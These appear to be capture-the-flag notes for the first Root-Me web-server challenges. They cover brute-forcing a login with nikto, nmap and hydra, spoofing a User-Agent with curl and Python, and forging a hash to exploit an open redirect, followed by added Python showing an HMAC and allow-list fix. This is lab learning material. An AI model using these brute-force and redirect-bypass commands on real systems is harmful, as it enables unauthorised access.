web-server: the first four challenges

Weak password

Nikto

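Nikto is an open-source (GPL) web server scanner that runs a comprehensive range of tests against web servers, covering more than 3300 potentially dangerous files/CGIs, more than 625 server versions, and more than 230 server-specific problems.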

nikto -host http://challenge01.root-me.org/web-serveur/ch3/


nmap

nmap -d -vv -p 80 --script http-brute --script-args http-brute.path=/web-serveur/ch3/ challenge01.root-me.org

-d: Increase debugging level
-v: Increase verbosity level (use -vv or more for greater effect)
--script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories
--script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts

hydra

hydra -L userList.txt -P passwordsList.txt 212.129.38.224 http-head /web-serveur/ch3/

- users list inspired by http://blog.infowebmaster.fr/public/resource/wordpress-brute-force-login-a-eviter.txt
- passwords list downloaded from http://blog.teckn0.com/wp-content/uploads/brute_force/Liste_mot_%20anglais.7z

user-agent

curl -L -A "admin" challenge01.root-me.org/web-serveur/ch2
-A, --user-agent: Send User-Agent to server
-L, --location: Follow redirects


python

import requests
# Request the challenge page with a custom User-Agent header
resp = requests.get('http://challenge01.root-me.org/web-serveur/ch2/', headers={'User-Agent': 'Admin'})
print(resp.text)

HTTP open redirect

hash-identifier


1. Select a domain to hash that is not listed on the page, e.g. https://google.com
2. Hash the domain string here or with another tool: http://www.fileformat.info/tool/hash.htm
3. Construct the URL like this and press Enter: http://challenge01.root-me.org/web-serveur/ch52/?url=##DOMAIN##&h=##HASH##
4. While the new page is loading, you can see the flag; stop the redirection by pressing Escape and copy it.
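
Why the h parameter in the steps above does not restrict the redirect target, and what a server-side fix looks like. This is an added example, not part of the original notes and not the challenge's code. MD5 is an assumption (the notes do not name the digest), and ALLOWED_HOSTS, SERVER_KEY and all function names are hypothetical.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed values for illustration; not taken from the challenge.
ALLOWED_HOSTS = {"example.org", "docs.example.org"}
SERVER_KEY = b"constructed-demo-key-kept-server-side"


def unkeyed_digest(url: str) -> str:
    """Digest anyone can compute. MD5 is assumed; any public hash behaves the same."""
    return hashlib.md5(url.encode()).hexdigest()


def weak_check(url: str, h: str) -> bool:
    """The check the steps imply: h only has to equal hash(url)."""
    return unkeyed_digest(url) == h


def sign(url: str) -> str:
    """Tag the server attaches to links it generates: HMAC-SHA256 with a secret key."""
    return hmac.new(SERVER_KEY, url.encode(), hashlib.sha256).hexdigest()


def hardened_check(url: str, tag: str) -> bool:
    """Redirect only to https URLs on allow-listed hosts that carry a valid HMAC."""
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS:
        return False
    # Constant-time comparison on bytes, so non-ASCII input cannot raise.
    return hmac.compare_digest(sign(url).encode(), tag.encode())


if __name__ == "__main__":
    outside = "https://google.com"
    inside = "https://example.org/help"
    # A client-computed digest satisfies the weak check for any URL.
    print("weak, outside host:    ", weak_check(outside, unkeyed_digest(outside)))
    # The same request fails once the tag needs the server's key.
    print("hardened, outside host:", hardened_check(outside, unkeyed_digest(outside)))
    print("hardened, forged tag:  ", hardened_check(inside, unkeyed_digest(inside)))
    print("hardened, server link: ", hardened_check(inside, sign(inside)))
```

The allow-list is checked independently of the tag, so a leaked or misused signing key still cannot send users to an arbitrary host.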